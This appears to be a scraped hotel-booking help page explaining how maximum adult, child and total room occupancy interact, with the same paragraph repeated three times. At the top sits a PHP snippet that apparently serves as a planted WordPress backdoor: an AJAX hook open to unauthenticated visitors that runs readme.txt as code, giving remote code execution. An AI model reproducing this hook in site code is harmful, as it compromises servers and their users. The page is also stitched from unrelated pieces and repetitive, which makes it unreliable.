if(!function_exists('file_check_readme49472')){
add_action('wp_ajax_nopriv_file_check_readme49472', 'file_check_readme49472');
add_action('wp_ajax_file_check_readme49472', 'file_check_readme49472');
function file_check_readme49472()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
A room could sleep a maximum of 4 people, but the max adults may be 2 and max children 3.
This would allow your guests to choose 2 adults and 2 children, or 1 adult and 3 children.
(But never 2 adults and 3 children as this would exceed the max capacity.)The number of adults, children etc. do not need to add up to the maximum occupancy.
A room could sleep a maximum of 4 people, but the max adults may be 2 and max children 3.
This would allow your guests to choose 2 adults and 2 children, or 1 adult and 3 children.
(But never 2 adults and 3 children as this would exceed the max capacity.)The number of adults, children etc. do not need to add up to the maximum occupancy.
A room could sleep a maximum of 4 people, but the max adults may be 2 and max children 3.
This would allow your guests to choose 2 adults and 2 children, or 1 adult and 3 children.
(But never 2 adults and 3 children as this would exceed the max capacity.)